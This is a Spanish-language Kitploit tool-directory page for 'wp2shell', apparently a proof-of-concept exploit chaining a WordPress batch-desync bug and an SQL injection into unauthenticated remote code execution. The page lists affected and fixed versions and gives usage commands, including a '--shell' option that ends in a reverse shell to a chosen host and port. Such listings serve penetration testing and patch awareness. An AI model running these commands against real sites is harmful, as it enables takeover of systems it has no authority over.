Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-63030 — Exploit PoC de WordPress Core RCE no autenticado conocido como WP2Shell | Kitploit
Herramientas/GitHubGitHub/mverschu/cve-2026-63030
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubmverschu/cve-2026-63030

CVE-2026-63030

Exploit PoC de WordPress Core RCE no autenticado conocido como WP2Shell

Ver Repositorio
41hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

wp2shell (CVE-2026-63030 / CVE-2026-60137)

Nombrewp2shell
CVEsCVE-2026-63030 (desincronización por lotes), CVE-2026-60137 (SQLi author__not_in)
AfectadoWordPress 6.9.0 a 6.9.4, 7.0.0 a 7.0.1
Corregido en6.9.5, 7.0.2
Autenticación necesariaNinguna
Encontrado porAdam Kues (Searchlight Cyber / Assetnote)

Uso

Host simple = esquema automático (prueba https:// y luego http://). Prefija con http:// o https:// solo cuando quieras forzar uno.

root@kitploit:~
# auto-detect scheme
wp2shell target.example
wp2shell 127.0.0.1:8080

# force a scheme
wp2shell https://target.example/
wp2shell http://127.0.0.1:8080/

# timing confirm
wp2shell target.example --confirm-sqli

# SQLi -> oEmbed/admin bridge -> plugin -> reverse shell
wp2shell target.example --shell
wp2shell target.example --shell 192.168.1.10 4443
Descargar herramienta
FlagQué hace
--shell [LHOST [LPORT]]cadena RCE predeterminada; LHOST predeterminado es la IP de esta máquina, LPORT es 443
--rest-routeprobar primero /?rest_route=/batch/v1
--verify-tlsverificar certificados TLS (desactivada por defecto para entornos de laboratorio/autofirmados)
--proxy URLenviar tráfico a través de un proxy
--forcesaltar la identificación de WordPress